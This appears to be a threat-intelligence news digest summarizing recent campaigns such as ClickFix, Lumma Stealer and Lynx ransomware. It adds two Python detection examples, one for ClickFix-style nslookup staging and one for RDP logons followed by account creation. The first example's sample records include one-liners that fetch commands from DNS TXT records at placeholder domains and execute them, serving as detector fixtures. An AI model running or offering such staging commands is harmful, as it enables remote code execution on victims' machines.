Threat actors created disposable Atlassian Jira Cloud instances and abused Jira Automation and the platform’s trusted atlassian.net email reputation to deliver automated, localized spam and targeted lures to recipients across multiple languages and sectors. The campaigns used integrated email-sending services and Keitaro TDS redirects to funnel victims to investment scams and…
Tag: SSO
Daily Recap: researchers report a live ClawdBot infection that exfiltrates OpenClaw configurations (including private keys), enabling AI-agent impersonation, while CTM360 warns of a global campaign distributing Lumma Stealer and a trojanized Ninja Browser via Google Groups and weaponized ad fraud. Patch alerts follow: BeyondTrust CVE-2026-1731 should be patched within three days, Google Chrome's high-severity zero-day CVE-2026-2441 has been fixed across platforms, and KB5077181 addresses Windows 11 boot issues. Also covered: Lotus Blossom hijacking Notepad++ updates to deploy Chrysalis and Cobalt Strike against high-value targets, VoidLink campaigns affecting the technology and financial sectors, and ShinyHunters' Canada Goose data leak. #ClawdBot #OpenClaw #LummaStealer #NinjaBrowser #ModeloRAT #NotepadPlusPlus #Chrysalis #CobaltStrike #LotusBlossom #VoidLink #ShinyHunters #CanadaGoose #BeyondTrust #ChromeZeroDay
Researchers at ETH Zurich analyzed popular cloud-based password managers under a malicious-server threat model, the setting that vendors' zero-knowledge claims are meant to cover, and found multiple ways attackers could compromise users' vaults. They demonstrated full vault compromise for Bitwarden and LastPass, shared-vault compromise for Dashlane, and attacks targeting account recovery, SSO, sharing, and vault integrity, while vendors have issued…
The Federal Government filed a three-count criminal charge against former Kaduna State governor Nasir El-Rufai, accusing him of unlawfully intercepting National Security Adviser Nuhu Ribadu’s communications and failing to report related offenses. The case, brought by the DSS under provisions of the Cybercrimes (Amendment) Act 2024 and the Nigerian Communications Act…
Ten defacement incidents targeted Indonesian websites (.id domains), affecting multiple school and library sites across the country. Two actors were involved: Maria (seven incidents) and Ghost Haxor (three). #Indonesia…
Google released the first Android 17 beta with a range of privacy, security, and developer-focused improvements across performance, media, camera, and connectivity. Major security changes include deprecation of the usesCleartextTraffic attribute (blocking cleartext by default without a network security config), a public SPI for HPKE hybrid cryptography, certificate transparency enabled by…
A threat actor using the handle “Angel_Batista” claims to be selling the databases of Russian EdTech platform Foxford, alleging a breach impacting approximately 13.6 million customers. The listing reportedly appeared on Tor and, if verified, would be one of the largest education-sector data breaches reported this year. #Angel_Batista #Foxford…
OpenClaw configuration and memory files containing API keys, authentication tokens, private keys, and agent memories were exfiltrated in the first reported in-the-wild infostealer compromise, likely a Vidar variant, enabling potential full compromise of a user’s AI agent identity. Researchers warn infostealers will increasingly target agent frameworks as they become widespread, and Tenable also disclosed a separate max-severity remote flaw in Nanobot (CVE-2026-2577) that was patched. #OpenClaw #Vidar #HudsonRock #Nanobot #CVE-2026-2577
Since last year, Western websites have experienced a sustained surge of automated traffic traced to China and Singapore, with analytics showing near-zero engagement and behavior consistent with bots. Much of the traffic appears routed through servers linked to Tencent and repeatedly geolocated to Lanzhou, prompting speculation about large-scale scraping—possibly for AI…
Microsoft and others reported exploitation of Internet-facing SolarWinds Web Help Desk servers that enabled multi-stage intrusions beginning in December 2025, involving remote MSI installations, abuse of RMM tooling, and credential dumping. Elastic and Microsoft observed the use of legitimate tools (Velociraptor, Cloudflared, QEMU) for persistence and tunneling, and Elastic published detection and prevention rules for the activity. #SolarWindsWHD #Velociraptor
ShinyHunters claims to have published a 1.67 GB dataset containing over 600,000 historical Canada Goose customer records with names, contact details, partial payment card information, IP addresses, and order histories. Canada Goose says it has found no evidence of a breach of its own systems and is reviewing the dataset's accuracy and scope; even so, the exposed data could be abused for phishing, social engineering, fraud, and profiling of high-value customers. #ShinyHunters #CanadaGoose
Unit 42 revealed that Lotus Blossom, a state-sponsored group, compromised Notepad++’s shared hosting to hijack update traffic and deliver targeted malicious updates between June and December 2025. The attackers used an Adversary-in-the-Middle capability to selectively serve payloads—deploying the Chrysalis backdoor via DLL side-loading or a Cobalt Strike Beacon via injected Lua…
CTM360 reports an active global campaign abusing over 4,000 malicious Google Groups and 3,500 Google-hosted URLs to distribute credential‑stealing malware and establish persistent access on compromised devices. Windows users are targeted with an oversized, password‑protected archive delivering the Lumma infostealer, while Linux users are redirected to a trojanized Chromium “Ninja Browser” that silently installs malicious extensions and persistence mechanisms. #LummaStealer #NinjaBrowser
Microsoft disclosed a new ClickFix variant that tricks users into running nslookup via the Windows Run dialog and cmd.exe to perform DNS-based staging and fetch a second-stage payload. The chain downloads a ZIP from azwsappdev[.]com that leads to a Python script, VBScript and ModeloRAT persistence, while related campaigns use CastleLoader, Lumma…
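The distinguishing feature of the chain above is that the text pasted into the Run dialog becomes the command line of a shell spawned by explorer.exe, and that command line itself invokes nslookup and consumes the DNS answer. The following is an added example, not code or telemetry from the Microsoft report: it encodes that pattern as a check over process-creation records in a Sysmon Event ID 1-like shape (ParentImage, Image, CommandLine). The sample records, the domain names, and the field names are constructed for this example.

```python
import ntpath
import re
from typing import Optional

# Process-creation records in a Sysmon Event ID 1-like shape. They are
# constructed for this example, not telemetry from the Microsoft report.
SAMPLE_EVENTS = [
    {   # Pasted into the Run dialog: explorer.exe spawns cmd.exe, whose own
        # command line runs nslookup and executes the TXT answer.
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c for /f \"tokens=*\" %i in "
                       "('nslookup -q=txt stage.example.invalid') do @%i",
    },
    {   # Same parent/child pattern, PowerShell flavour, answer piped onward.
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -w hidden -c \"nslookup -type=TXT "
                       "cfg.example.invalid | Select-String http\"",
    },
    {   # Benign: an admin opens an interactive cmd window from the desktop.
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" ",
    },
    {   # Benign: a plain lookup typed into that window runs as its own process.
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\nslookup.exe",
        "CommandLine": "nslookup  mail.example.invalid",
    },
    {   # Out of scope: scheduled TXT check, not launched from the Run dialog.
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c nslookup -q=txt _dmarc.example.invalid "
                       "> C:\\logs\\dmarc.txt",
    },
]

RUN_DIALOG_PARENTS = {"explorer.exe"}  # the Run dialog launches via explorer
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

NSLOOKUP = re.compile(r"(?i)\bnslookup(?:\.exe)?\b")
# nslookup option spellings that request TXT records (the staging channel).
TXT_QUERY = re.compile(r"(?i)-(?:q|query|querytype|type|ty)=txt")
# The answer is consumed by another command rather than shown to the user.
CONSUMES_OUTPUT = re.compile(r"(?i)for\s+/f|\|\||&&|\||&")


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def detect(event: dict) -> Optional[dict]:
    """Return matched indicators for a ClickFix-style nslookup launch, else None.

    Fires only when all three conditions from the reported chain line up: the
    shell was spawned by explorer.exe (Run dialog), the child is cmd/powershell,
    and the shell's own command line invokes nslookup (a pasted one-liner).
    """
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    if parent not in RUN_DIALOG_PARENTS or image not in SHELLS:
        return None
    if not NSLOOKUP.search(cmdline):
        return None
    indicators = ["run_dialog_shell", "nslookup_in_shell_cmdline"]
    if TXT_QUERY.search(cmdline):
        indicators.append("txt_record_query")
    if CONSUMES_OUTPUT.search(cmdline):
        indicators.append("nslookup_output_consumed")
    return {"parent": parent, "image": image, "indicators": indicators,
            "command_line": cmdline}


def scan(events: list) -> list:
    """Run detect() over a batch of records and keep only the hits."""
    return [hit for hit in map(detect, events) if hit is not None]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["image"], hit["indicators"])
```

The two extra indicators (TXT query, output consumed) are what separate staging from a user who genuinely typed `nslookup host` into a shell; the scheduled-task record shows the deliberate limit of the rule, which is scoped to the Run-dialog parent and would need a separate rule for non-interactive launches.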
The intrusion began with a valid RDP login using pre-compromised credentials and progressed through rapid discovery, lateral movement, and the creation of persistent accounts before data exfiltration and a final ransomware deployment. The actor exfiltrated archives to temp.sh and deployed Lynx ransomware, leveraging infrastructure tied to Railnet LLC/Virtualine. #Lynx #RailnetLLC
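Because the initial RDP logon used valid credentials, authentication alerts on their own say nothing; the signal is the sequence the summary describes, an interactive RDP logon followed shortly by that same account creating a new local account. The following is an added example, not code or data from the report: a correlation over flattened Windows Security events (4624 with LogonType 10 for RDP, 4720 for user account created). The events, host names, addresses and the 30-minute window are constructed assumptions for this example.

```python
from datetime import datetime, timedelta

# Maximum gap between the RDP logon and the account creation (an assumption).
WINDOW = timedelta(minutes=30)

# Flattened Windows Security events, constructed for this example (not data
# from the report). 4624/logon_type 10 = interactive RDP logon; 4720 = user
# account created, where subject_user is the account that created it.
SAMPLE_EVENTS = [
    {"time": "2026-01-10T02:14:07", "host": "FS01", "id": 4624, "logon_type": 10,
     "user": "svc_backup", "src_ip": "203.0.113.45"},
    {"time": "2026-01-10T02:21:40", "host": "FS01", "id": 4720,
     "subject_user": "svc_backup", "new_user": "support"},
    # Routine admin work: console logon (type 2), then a new-hire account.
    {"time": "2026-01-10T09:05:00", "host": "DC01", "id": 4624, "logon_type": 2,
     "user": "jdoe", "src_ip": "-"},
    {"time": "2026-01-10T09:07:12", "host": "DC01", "id": 4720,
     "subject_user": "jdoe", "new_user": "newhire"},
    # RDP logon, but the account appears hours later: outside the window.
    {"time": "2026-01-10T12:00:00", "host": "APP02", "id": 4624, "logon_type": 10,
     "user": "admin2", "src_ip": "10.0.0.5"},
    {"time": "2026-01-10T15:30:00", "host": "APP02", "id": 4720,
     "subject_user": "admin2", "new_user": "tmp"},
]


def correlate(events, window=WINDOW):
    """Pair each 4720 with the most recent RDP 4624 for the same host and
    subject account, and keep the pair when the gap is within `window`."""
    hits = []
    latest_rdp = {}  # (host, account) -> (logon time, logon event)
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4624 and ev.get("logon_type") == 10:
            latest_rdp[(ev["host"], ev["user"].lower())] = (ts, ev)
        elif ev["id"] == 4720:
            key = (ev["host"], ev["subject_user"].lower())
            if key not in latest_rdp:
                continue  # creator never logged on over RDP on this host
            logon_ts, logon = latest_rdp[key]
            if ts - logon_ts <= window:
                hits.append({
                    "host": ev["host"],
                    "logon_user": logon["user"],
                    "src_ip": logon["src_ip"],
                    "new_user": ev["new_user"],
                    "seconds_after_logon": int((ts - logon_ts).total_seconds()),
                })
    return hits


if __name__ == "__main__":
    for hit in correlate(SAMPLE_EVENTS):
        print(hit)
```

The source IP of the paired logon is carried into the hit on purpose: with valid credentials the address is often the only attribute that ties the session to the actor's infrastructure, which is how the summary attributes this case to Railnet LLC/Virtualine.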